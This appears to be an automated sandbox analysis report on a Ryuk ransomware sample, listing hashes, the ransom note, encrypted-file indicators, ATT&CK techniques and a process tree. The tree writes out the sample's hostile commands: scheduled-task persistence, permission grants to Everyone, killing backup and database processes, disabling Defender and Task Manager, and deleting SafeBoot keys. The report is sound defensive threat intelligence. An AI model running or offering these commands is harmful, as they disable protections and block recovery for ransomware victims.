ryuk | 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

Resubmissions

21-09-2022 20:38

220921-ze6ayshae5 10

21-09-2022 20:33

220921-zbzzrscfcl 10

Analysis

max time kernel
112s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
21-09-2022 20:33

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

ryuk.exe
Size

885KB
MD5

35194c73ff38dd6c3bed7c0efcff6826
SHA1

1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256

5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512

cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
SSDEEP

12288:CXrZ7kwy8U9JlpYqWYgeWYg955/155/0QebUlAAs7sKSAoSRn6X:C97ktflKgQKUKR7sKSAhN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
388	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	ryuk.exe
File opened (read-only)	\??\M:	ryuk.exe
File opened (read-only)	\??\N:	ryuk.exe
File opened (read-only)	\??\Q:	ryuk.exe
File opened (read-only)	\??\R:	ryuk.exe
File opened (read-only)	\??\O:	ryuk.exe
File opened (read-only)	\??\S:	ryuk.exe
File opened (read-only)	\??\U:	ryuk.exe
File opened (read-only)	\??\V:	ryuk.exe
File opened (read-only)	\??\E:	ryuk.exe
File opened (read-only)	\??\F:	ryuk.exe
File opened (read-only)	\??\K:	ryuk.exe
File opened (read-only)	\??\A:	ryuk.exe
File opened (read-only)	\??\T:	ryuk.exe
File opened (read-only)	\??\X:	ryuk.exe
File opened (read-only)	\??\Y:	ryuk.exe
File opened (read-only)	\??\Z:	ryuk.exe
File opened (read-only)	\??\H:	ryuk.exe
File opened (read-only)	\??\L:	ryuk.exe
File opened (read-only)	\??\B:	ryuk.exe
File opened (read-only)	\??\P:	ryuk.exe
File opened (read-only)	\??\G:	ryuk.exe
File opened (read-only)	\??\I:	ryuk.exe
File opened (read-only)	\??\J:	ryuk.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ul-oob.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ul-phn.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryLetter.dotx.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\ui-strings.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main-selector.css.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\GRLEX.DLL.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLL.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-ppd.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN105.XML.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\km.pak.DATA.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\help.svg.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-100.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ppd.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.WPG.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\DocumentRepository.ico.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mr.pak.DATA.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ul-phn.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONDIRECTX.DLL.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\de_get.svg.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ga.pak.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7EN.dub.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[[email protected]].RYK	ryuk.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo.[[email protected]].RYK	ryuk.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4192	schtasks.exe
4528	schtasks.exe
3568	schtasks.exe
3600	schtasks.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3884	taskkill.exe
968	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe
4824	ryuk.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4824 wrote to memory of 3064	4824	ryuk.exe	81
PID 4824 wrote to memory of 3064	4824	ryuk.exe	81
PID 3064 wrote to memory of 3600	3064	cmd.exe	82
PID 3064 wrote to memory of 3600	3064	cmd.exe	82
PID 4824 wrote to memory of 5032	4824	ryuk.exe	83
PID 4824 wrote to memory of 5032	4824	ryuk.exe	83
PID 4824 wrote to memory of 1732	4824	ryuk.exe	84
PID 4824 wrote to memory of 1732	4824	ryuk.exe	84
PID 4824 wrote to memory of 4112	4824	ryuk.exe	85
PID 4824 wrote to memory of 4112	4824	ryuk.exe	85
PID 4112 wrote to memory of 4192	4112	cmd.exe	86
PID 4112 wrote to memory of 4192	4112	cmd.exe	86
PID 4824 wrote to memory of 1672	4824	ryuk.exe	87
PID 4824 wrote to memory of 1672	4824	ryuk.exe	87
PID 1672 wrote to memory of 1128	1672	cmd.exe	88
PID 1672 wrote to memory of 1128	1672	cmd.exe	88
PID 4824 wrote to memory of 3596	4824	ryuk.exe	89
PID 4824 wrote to memory of 3596	4824	ryuk.exe	89
PID 3596 wrote to memory of 4528	3596	cmd.exe	90
PID 3596 wrote to memory of 4528	3596	cmd.exe	90
PID 4824 wrote to memory of 628	4824	ryuk.exe	91
PID 4824 wrote to memory of 628	4824	ryuk.exe	91
PID 628 wrote to memory of 3568	628	cmd.exe	92
PID 628 wrote to memory of 3568	628	cmd.exe	92
PID 4824 wrote to memory of 1148	4824	ryuk.exe	93
PID 4824 wrote to memory of 1148	4824	ryuk.exe	93
PID 1148 wrote to memory of 2372	1148	cmd.exe	94
PID 1148 wrote to memory of 2372	1148	cmd.exe	94
PID 4824 wrote to memory of 2768	4824	ryuk.exe	95
PID 4824 wrote to memory of 2768	4824	ryuk.exe	95
PID 2768 wrote to memory of 2324	2768	cmd.exe	96
PID 2768 wrote to memory of 2324	2768	cmd.exe	96
PID 4824 wrote to memory of 2764	4824	ryuk.exe	97
PID 4824 wrote to memory of 2764	4824	ryuk.exe	97
PID 4824 wrote to memory of 4532	4824	ryuk.exe	98
PID 4824 wrote to memory of 4532	4824	ryuk.exe	98
PID 2764 wrote to memory of 4352	2764	cmd.exe	100
PID 2764 wrote to memory of 4352	2764	cmd.exe	100
PID 4532 wrote to memory of 1472	4532	cmd.exe	99
PID 4532 wrote to memory of 1472	4532	cmd.exe	99
PID 4824 wrote to memory of 228	4824	ryuk.exe	102
PID 4824 wrote to memory of 228	4824	ryuk.exe	102
PID 228 wrote to memory of 1556	228	cmd.exe	103
PID 228 wrote to memory of 1556	228	cmd.exe	103
PID 228 wrote to memory of 3884	228	cmd.exe	105
PID 228 wrote to memory of 3884	228	cmd.exe	105
PID 4824 wrote to memory of 3080	4824	ryuk.exe	106
PID 4824 wrote to memory of 3080	4824	ryuk.exe	106
PID 4824 wrote to memory of 1124	4824	ryuk.exe	107
PID 4824 wrote to memory of 1124	4824	ryuk.exe	107
PID 4352 wrote to memory of 388	4352	cmd.exe	108
PID 4352 wrote to memory of 388	4352	cmd.exe	108
PID 4824 wrote to memory of 5112	4824	ryuk.exe	109
PID 4824 wrote to memory of 5112	4824	ryuk.exe	109
PID 1556 wrote to memory of 968	1556	cmd.exe	110
PID 1556 wrote to memory of 968	1556	cmd.exe	110
PID 4824 wrote to memory of 4804	4824	ryuk.exe	111
PID 4824 wrote to memory of 4804	4824	ryuk.exe	111
PID 4824 wrote to memory of 5060	4824	ryuk.exe	112
PID 4824 wrote to memory of 5060	4824	ryuk.exe	112
PID 4824 wrote to memory of 2896	4824	ryuk.exe	113
PID 4824 wrote to memory of 2896	4824	ryuk.exe	113
PID 2896 wrote to memory of 4564	2896	cmd.exe	114
PID 2896 wrote to memory of 4564	2896	cmd.exe	114

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2372	attrib.exe
2324	attrib.exe
1128	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:3600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4112
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:1128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:628
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1148
- - C:\Windows\system32\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:2324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4352
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\system32\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\system32\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:968
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:4804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:2548
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1976
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:3876
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1312

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4988

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d
1⤵
PID:4124

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID

Filesize
8B

MD5
20bf1c3daf0bf3cfb0db6661538a9afc

SHA1
5db0319ce78dcae075cc393c374b0856cdc2e02a

SHA256
fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6

SHA512
